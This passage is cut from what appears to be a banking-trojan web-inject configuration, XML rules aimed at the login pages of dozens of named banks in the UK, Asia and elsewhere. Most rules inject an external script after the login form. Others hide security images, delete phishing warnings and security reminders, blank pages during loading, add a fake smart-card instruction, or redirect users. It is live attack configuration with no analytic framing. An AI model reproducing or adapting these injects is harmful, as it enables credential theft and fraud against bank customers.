2503. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.unity\-online\.co\.uk</url>
2504. </conditions>
2505. <actions>
2506. <modify>
2507. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2508. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2509. </modify>
2510. </actions>
2511. </httpinject>
2512. <httpinject>
2513. <conditions>
2514. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://online\.ybs\.co\.uk/public/authentication/login1\.do</url>
2515. </conditions>
2516. <actions>
2517. <modify>
2518. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2519. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2520. </modify>
2521. </actions>
2522. </httpinject>
2523. <httpinject>
2524. <conditions>
2525. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.nwolb\.com/(login|default)\.aspx
2526. </url>
2527. </conditions>
2528. <actions>
2529. <modify>
2530. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2531. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2532. </modify>
2533. <modify>
2534. <pattern modifiers="i"><![CDATA[(class="frame securityImage")]]></pattern>
2535. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
2536. </modify>
2537. </actions>
2538. </httpinject>
2539. <httpinject>
2540. <conditions>
2541. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://banking\.lloydsbank\.com/Logon/logon\.aspx(\?|$)
2542. </url>
2543. </conditions>
2544. <actions>
2545. <modify>
2546. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2547. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2548. </modify>
2549. <modify>
2550. <pattern modifiers="i"><![CDATA[ class="message">Reminder.*</span>]]></pattern>
2551. <replacement><![CDATA[></span>]]></replacement>
2552. </modify>
2553. </actions>
2554. </httpinject>
2555. <httpinject>
2556. <conditions>
2557. <url type="allow" onpost="1" onget="1" modifiers="">^https://.*business\.lloydsbank\.co\.uk/business
2558. </url>
2559. </conditions>
2560. <actions>
2561. <modify>
2562. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2563. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2564. </modify>
2565. </actions>
2566. </httpinject>
2567. <httpinject>
2568. <conditions>
2569. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://bbank\d+\.ybonline\.co\.uk/ifdu/ifdlm\-web/login\.ctl</url>
2570. </conditions>
2571. <actions>
2572. <modify>
2573. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2574. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2575. </modify>
2576. </actions>
2577. </httpinject>
2578. <httpinject>
2579. <conditions>
2580. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://home\d+\.ybonline.co\.uk/ralu/reglm\-web/login\.ctl</url>
2581. </conditions>
2582. <actions>
2583. <modify>
2584. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2585. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2586. </modify>
2587. </actions>
2588. </httpinject>
2589. <httpinject>
2590. <conditions>
2591. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ibank\d*\.bib\.barclays\.com/logon/
2592. </url>
2593. </conditions>
2594. <actions>
2595. <modify>
2596. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
2597. <replacement><![CDATA[\1
2598. <style type="text/css">
2599. body {visibility: hidden; }
2600. </style>
2601. <script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>
2602. <script type="text/javascript">setTimeout(function(){document.body.style.visibility = 'visible';}, 5000);</script>
2603. ]]></replacement>
2604. </modify>
2605. <modify>
2606. <pattern modifiers="msU"><![CDATA[Your security obligations.*<script]]></pattern>
2607. <replacement><![CDATA[Your security obligations</p></td></tr><tr/><tr/><tr><td width="10%"/><td class="bodytext" colspan="1"><p>Due to our recent security changes you should <b>keep your smart card inserted in your card reader</b>. </p><p>This security message will appear periodically.</p><p>Please tick the box to acknowledge these security obligations.</p></td><td width="40%"/></tr></table><script]]></replacement>
2608. </modify>
2609. </actions>
2610. </httpinject>
2611. <httpinject>
2612. <conditions>
2613. <url type="allow" onpost="1" onget="1" modifiers="">^https://online\-business\.tsb\.co\.uk/business/logon/login\.jsp</url>
2614. </conditions>
2615. <actions>
2616. <modify>
2617. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2618. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2619. </modify>
2620. </actions>
2621. </httpinject>
2622. <httpinject>
2623. <conditions>
2624. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://home\d+\.cbonline.co\.uk/ralu.*/reglm\-web/login\.ctl
2625. </url>
2626. </conditions>
2627. <actions>
2628. <modify>
2629. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2630. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2631. </modify>
2632. </actions>
2633. </httpinject>
2634. <httpinject>
2635. <conditions>
2636. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.business\.hsbc\.co\.uk/1/2/</url>
2637. </conditions>
2638. <actions>
2639. <modify>
2640. <pattern modifiers="msU"><![CDATA[(class\="hsbcContent.+</div>)]]></pattern>
2641. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2642. </modify>
2643. </actions>
2644. </httpinject>
2645. <httpinject>
2646. <conditions>
2647. <url type="allow" onpost="1" onget="1" modifiers="">^https://clientlogin\.ibb\.ubs\.com/login(\?|$)</url>
2648. </conditions>
2649. <actions>
2650. <modify>
2651. <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
2652. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2653. </modify>
2654. </actions>
2655. </httpinject>
2656. <httpinject>
2657. <conditions>
2658. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\d*\.secure\.hsbcnet\.com/uims/portal/IDV\_OTP\_CHALLENGE(;|$)</url>
2659. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\d*\.secure\.hsbcnet\.com/uims/portal/IDV\_CAM10\_AUTHENTICATION(;|$)</url>
2660. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\d*\.secure\.hsbcnet\.com/uims/content/public/hibm/logon/usernameInput.+</url>
2661. </conditions>
2662. <actions>
2663. <modify>
2664. <pattern modifiers=""><![CDATA[(</body>)]]></pattern>
2665. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
2666. </modify>
2667. <modify>
2668. <pattern modifiers=""><![CDATA[<p class="required">Important Reminder.*</p>]]></pattern>
2669. <replacement><![CDATA[]]></replacement>
2670. </modify>
2671. </actions>
2672. </httpinject>
2673. <httpinject>
2674. <conditions>
2675. <url type="allow" onpost="1" onget="1" modifiers="">^http://www\d*\.secure\.hsbcnet\.com/uims/content/public/hibm/logon/logon\.html</url>
2676. </conditions>
2677. <actions>
2678. <modify>
2679. <pattern modifiers=""><![CDATA[(<head>)]]></pattern>
2680. <replacement><![CDATA[\1
2681. <style>
2682. body {display:none;}
2683. </style>
2684. <script type="text/javascript" language="JavaScript">
2685. top.location.href = 'https://www2.secure.hsbcnet.com/uims/portal/IDV_CAM10_AUTHENTICATION';
2686. </script>]]></replacement>
2687. </modify>
2688. </actions>
2689. </httpinject>
2690. <httpinject>
2691. <conditions>
2692. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.rbsdigital\.com/(login|default)\.aspx
2693. </url>
2694. </conditions>
2695. <actions>
2696. <modify>
2697. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2698. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2699. </modify>
2700. <modify>
2701. <pattern modifiers="i"><![CDATA[(class="frame securityImage")]]></pattern>
2702. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
2703. </modify>
2704. </actions>
2705. </httpinject>
2706. <httpinject>
2707. <conditions>
2708. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.integrator\.barclays\.com/idc/html/LoginStep1\.html</url>
2709. </conditions>
2710. <actions>
2711. <modify>
2712. <pattern modifiers="Ui"><![CDATA[(</body>)]]></pattern>
2713. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
2714. </modify>
2715. </actions>
2716. </httpinject>
2717. <httpinject>
2718. <conditions>
2719. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.commercial\.hsbc\.com\.hk/1/2/.+</url>
2720. </conditions>
2721. <actions>
2722. <modify>
2723. <pattern modifiers="sAi"><![CDATA[(.+</body>)]]></pattern>
2724. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2725. </modify>
2726. </actions>
2727. </httpinject>
2728. <httpinject>
2729. <conditions>
2730. <url type="allow" onpost="1" onget="1" modifiers="">^https://internet\-banking\.hk\.dbs\.com/IB/Welcome(\?|$)</url>
2731. <url type="allow" onpost="1" onget="1" modifiers="">^https://internet\-banking\.dbs\.com\.sg/IB/Welcome(\?|$)</url>
2732. </conditions>
2733. <actions>
2734. <modify>
2735. <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
2736. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2737. </modify>
2738. </actions>
2739. </httpinject>
2740. <httpinject>
2741. <conditions>
2742. <url type="allow" onpost="1" onget="1" modifiers="i">^https://apib\d*\.anz\.com/apinetbank/(Startup|LoginEsInetANZ)\.aspx(\?|$)</url>
2743. </conditions>
2744. <actions>
2745. <modify>
2746. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2747. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2748. </modify>
2749. </actions>
2750. </httpinject>
2751. <httpinject>
2752. <conditions>
2753. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://cib\.affinonline\.com/business/login\.html</url>
2754. </conditions>
2755. <actions>
2756. <modify>
2757. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2758. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2759. </modify>
2760. </actions>
2761. </httpinject>
2762. <httpinject>
2763. <conditions>
2764. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ibank\.agribank\.com\.vn/ibank/index\.jsp</url>
2765. </conditions>
2766. <actions>
2767. <modify>
2768. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2769. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2770. </modify>
2771. </actions>
2772. </httpinject>
2773. <httpinject>
2774. <conditions>
2775. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.allianceonline\.net\.my/Corporate/welcome\.htm</url>
2776. </conditions>
2777. <actions>
2778. <modify>
2779. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2780. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2781. </modify>
2782. </actions>
2783. </httpinject>
2784. <httpinject>
2785. <conditions>
2786. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ambank\.amonline\.com\.my</url>
2787. </conditions>
2788. <actions>
2789. <modify>
2790. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
2791. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2792. </modify>
2793. </actions>
2794. </httpinject>
2795. <httpinject>
2796. <conditions>
2797. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.amesecurities\.com\.my/gc/main\.jsp</url>
2798. </conditions>
2799. <actions>
2800. <modify>
2801. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
2802. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2803. </modify>
2804. </actions>
2805. </httpinject>
2806. <httpinject>
2807. <conditions>
2808. <url type="allow" onpost="1" onget="1" modifiers="">^https://cib\.bochk\.com/login/fis/cib\_login012\_.*\.jsp(\?|$)</url>
2809. </conditions>
2810. <actions>
2811. <modify>
2812. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2813. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2814. </modify>
2815. </actions>
2816. </httpinject>
2817. <httpinject>
2818. <conditions>
2819. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ibank\.bri\.co\.id/cms/</url>
2820. </conditions>
2821. <actions>
2822. <modify>
2823. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2824. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2825. </modify>
2826. </actions>
2827. </httpinject>
2828. <httpinject>
2829. <conditions>
2830. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://bizibanking\.bangkokbank\.com/bblamsui/Signon.*\.aspx</url>
2831. </conditions>
2832. <actions>
2833. <modify>
2834. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2835. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2836. </modify>
2837. </actions>
2838. </httpinject>
2839. <httpinject>
2840. <conditions>
2841. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.bankislam\.biz/rib/login/index</url>
2842. </conditions>
2843. <actions>
2844. <modify>
2845. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
2846. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2847. </modify>
2848. </actions>
2849. </httpinject>
2850. <httpinject>
2851. <conditions>
2852. <url type="allow" onpost="1" onget="1" modifiers="">^https://cib\.bochk\.com/login/cib\_login012\_.*\.jsp(\?|$)</url>
2853. </conditions>
2854. <actions>
2855. <modify>
2856. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2857. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2858. </modify>
2859. </actions>
2860. </httpinject>
2861. <httpinject>
2862. <conditions>
2863. <url type="allow" onpost="1" onget="1" modifiers="">^https://eb\.bankcomm\.com\.hk/eb/login\.action(\?|$)</url>
2864. </conditions>
2865. <actions>
2866. <modify>
2867. <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
2868. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2869. </modify>
2870. </actions>
2871. </httpinject>
2872. <httpinject>
2873. <conditions>
2874. <url type="allow" onpost="1" onget="1" modifiers="">^https://biz\.hkbea\-cyberbanking\.com/servlet/MA01Show(\?|$)</url>
2875. </conditions>
2876. <actions>
2877. <modify>
2878. <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
2879. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2880. </modify>
2881. </actions>
2882. </httpinject>
2883. <httpinject>
2884. <conditions>
2885. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://private\.bankofsingapore\.com/IPBWBWeb/Login/.+\.aspx(\?|$)</url>
2886. </conditions>
2887. <actions>
2888. <modify>
2889. <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
2890. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2891. </modify>
2892. </actions>
2893. </httpinject>
2894. <httpinject>
2895. <conditions>
2896. <url type="allow" onpost="1" onget="1" modifiers="i">^https://www\.bizchannel\.cimb\.com\.sg/corp/common\d*/login\.do(\?|$)</url>
2897. </conditions>
2898. <actions>
2899. <modify>
2900. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
2901. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2902. </modify>
2903. </actions>
2904. </httpinject>
2905. <httpinject>
2906. <conditions>
2907. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.ebanking\.cimbthai\.com/cash/logon\.jsp</url>
2908. </conditions>
2909. <actions>
2910. <modify>
2911. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2912. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2913. </modify>
2914. </actions>
2915. </httpinject>
2916. <httpinject>
2917. <conditions>
2918. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.citibusiness\.citibank\.com\.sg/SGCBZ/JSO/signon/DisplayCinSignon\.do(\?|$)</url>
2919. </conditions>
2920. <actions>
2921. <modify>
2922. <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
2923. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2924. </modify>
2925. <modify>
2926. <pattern modifiers="sA"><![CDATA[.+(?<inject><b>PHISHING ALERT</b>.+?</font>.+?)</font>]]></pattern>
2927. <replacement />
2928. </modify>
2929. </actions>
2930. </httpinject>
2931. <httpinject>
2932. <conditions>
2933. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.citibank\.com\.my/MYGCB/JPS/portal/Index\.do</url>
2934. </conditions>
2935. <actions>
2936. <modify>
2937. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2938. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2939. </modify>
2940. </actions>
2941. </httpinject>
2942. <httpinject>
2943. <conditions>
2944. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.credit\-suisse\.com\.sg/amserver/UI/Login(\?|$)</url>
2945. </conditions>
2946. <actions>
2947. <modify>
2948. <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
2949. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2950. </modify>
2951. </actions>
2952. </httpinject>
2953. <httpinject>
2954. <conditions>
2955. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ideal\.dbs\.com/loginSubscriber/login/(SubscriberLoginServlet|pin\.jsp)</url>
2956. </conditions>
2957. <actions>
2958. <modify>
2959. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2960. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2961. </modify>
2962. </actions>
2963. </httpinject>
2964. <httpinject>
2965. <conditions>
2966. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://.*\.directnet\.com/dn/c/cls/auth</url>
2967. </conditions>
2968. <actions>
2969. <modify>
2970. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
2971. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2972. </modify>
2973. </actions>
2974. </httpinject>
2975. <httpinject>
2976. <conditions>
2977. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.fbo\.fubonbank\.com\.hk/fboPortal/index\_e\.jsp(\?|$)</url>
2978. </conditions>
2979. <actions>
2980. <modify>
2981. <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
2982. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2983. </modify>
2984. </actions>
2985. </httpinject>
2986. <httpinject>
2987. <conditions>
2988. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.hsbc\.com\.cn/1/2/.+</url>
2989. </conditions>
2990. <actions>
2991. <modify>
2992. <pattern modifiers="sAi"><![CDATA[(.+</body>)]]></pattern>
2993. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2994. </modify>
2995. </actions>
2996. </httpinject>
2997. <httpinject>
2998. <conditions>
2999. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.hsbc\.com\.sg/1/2/.+</url>
3000. </conditions>
3001. <actions>
3002. <modify>
3003. <pattern modifiers="sAi"><![CDATA[(.+</body>)]]></pattern>
3004. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3005. </modify>
3006. </actions>
3007. </httpinject>
3008. <httpinject>
3009. <conditions>
3010. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.hsbc\.com\.vn/1/2/</url>
3011. </conditions>
3012. <actions>
3013. <modify>
3014. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3015. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3016. </modify>
3017. </actions>
3018. </httpinject>
3019. <httpinject>
3020. <conditions>
3021. <url type="allow" onpost="1" onget="1" modifiers="U">^https://ebusiness\.hangseng\.com/1/2/</url>
3022. </conditions>
3023. <actions>
3024. <modify>
3025. <pattern modifiers="sAi"><![CDATA[(.+</form>)]]></pattern>
3026. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3027. </modify>
3028. </actions>
3029. </httpinject>
3030. <httpinject>
3031. <conditions>
3032. <url type="allow" onpost="1" onget="1" modifiers="">^https://ebank\.eonbank\.com\.my/cashmgmt/security/commonLogin\.jsp($|\?)</url>
3033. </conditions>
3034. <actions>
3035. <modify>
3036. <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
3037. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3038. </modify>
3039. </actions>
3040. </httpinject>
3041. <httpinject>
3042. <conditions>
3043. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.hongleongonline\.com\.my/business/public/main\.html</url>
3044. </conditions>
3045. <actions>
3046. <modify>
3047. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3048. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3049. </modify>
3050. </actions>
3051. </httpinject>
3052. <httpinject>
3053. <conditions>
3054. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ibps\.hpb\.hr/HPB\.iBank\.IBPS\.Web/login\.iface</url>
3055. </conditions>
3056. <actions>
3057. <modify>
3058. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3059. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3060. </modify>
3061. </actions>
3062. </httpinject>
3063. <httpinject>
3064. <conditions>
3065. <url type="allow" onpost="1" onget="1" modifiers="U">^https://ibank\.hncb\.com\.hk/netbank/pages/jsp/HKLogin/html/HKLogin\_en\.jsp(\?|$)</url>
3066. </conditions>
3067. <actions>
3068. <modify>
3069. <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
3070. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3071. </modify>
3072. </actions>
3073. </httpinject>
3074. <httpinject>
3075. <conditions>
3076. <url type="allow" onpost="1" onget="1" modifiers="">^https://cib\.icicibank\.com\.sg/CIBSGAPP/BANKAWAY(\?|$)</url>
3077. </conditions>
3078. <actions>
3079. <modify>
3080. <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
3081. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3082. </modify>
3083. </actions>
3084. </httpinject>
3085. <httpinject>
3086. <conditions>
3087. <url type="allow" onpost="1" onget="1" modifiers="">^https://(corpebankasia|corpebank)\.icbc\.com\.cn/icbc/corporbank/index.*\.jsp(\?|$)</url>
3088. </conditions>
3089. <actions>
3090. <modify>
3091. <pattern modifiers="isA"><![CDATA[(.+</form>)]]></pattern>
3092. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3093. </modify>
3094. </actions>
3095. </httpinject>
3096. <httpinject>
3097. <conditions>
3098. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ebank\.kasikornbankgroup\.com/kbiznet/login.*\.html</url>
3099. </conditions>
3100. <actions>
3101. <modify>
3102. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3103. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3104. </modify>
3105. </actions>
3106. </httpinject>
3107. <httpinject>
3108. <conditions>
3109. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ws\d+\.kasikornbank\.com/baliweb/\d+/site/defaultskin/.*/html/static/logon\.htm</url>
3110. </conditions>
3111. <actions>
3112. <modify>
3113. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
3114. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
3115. </modify>
3116. </actions>
3117. </httpinject>
3118. <httpinject>
3119. <conditions>
3120. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.kbc\.be/</url>
3121. </conditions>
3122. <actions>
3123. <modify>
3124. <pattern modifiers="isU"><![CDATA[(<form.*id="ID_LOGONFORM".*</form>)]]></pattern>
3125. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3126. </modify>
3127. </actions>
3128. </httpinject>
3129. <httpinject>
3130. <conditions>
3131. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://vpn\.tarumanagara\.com/\+CSCOE\+/logon\.html</url>
3132. </conditions>
3133. <actions>
3134. <modify>
3135. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3136. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3137. </modify>
3138. </actions>
3139. </httpinject>
3140. <httpinject>
3141. <conditions>
3142. <url type="allow" onpost="1" onget="1" modifiers="">^https://singapore\.lbbw\-business\.com/LBBWCorpWeb/login/.+\.action(\?|$)</url>
3143. </conditions>
3144. <actions>
3145. <modify>
3146. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
3147. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3148. </modify>
3149. </actions>
3150. </httpinject>
3151. <httpinject>
3152. <conditions>
3153. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://mcm\.bankmandiri\.co\.id/corp/common/login\.do\?action=login</url>
3154. </conditions>
3155. <actions>
3156. <modify>
3157. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3158. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3159. </modify>
3160. </actions>
3161. </httpinject>
3162. <httpinject>
3163. <conditions>
3164. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://mib\.bankmandiri\.co\.id/sme/common/login\.do\?action=login</url>
3165. </conditions>
3166. <actions>
3167. <modify>
3168. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3169. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3170. </modify>
3171. </actions>
3172. </httpinject>
3173. <httpinject>
3174. <conditions>
3175. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.maybank2u\.com\.my/mbb/m2u/common/mbbLoginCheckAdapt\.do</url>
3176. </conditions>
3177. <actions>
3178. <modify>
3179. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
3180. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3181. </modify>
3182. </actions>
3183. </httpinject>
3184. <httpinject>
3185. <conditions>
3186. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.maybank2u\.com\.my/mbb/m2uNOW/common/mbbLoginCheckAdapt\.do</url>
3187. </conditions>
3188. <actions>
3189. <modify>
3190. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
3191. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3192. </modify>
3193. </actions>
3194. </httpinject>
3195. <httpinject>
3196. <conditions>
3197. <url type="allow" onpost="1" onget="1" modifiers="">^https://sslsecure\.maybank\.com\.sg/cgi\-bin/mbs/scripts/mbb\_login\.jsp(\?|$)</url>
3198. </conditions>
3199. <actions>
3200. <modify>
3201. <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
3202. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3203. </modify>
3204. </actions>
3205. </httpinject>
3206. <httpinject>
3207. <conditions>
3208. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.maybank2e\.net/M2E/mbbcustomer/</url>
3209. </conditions>
3210. <actions>
3211. <modify>
3212. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
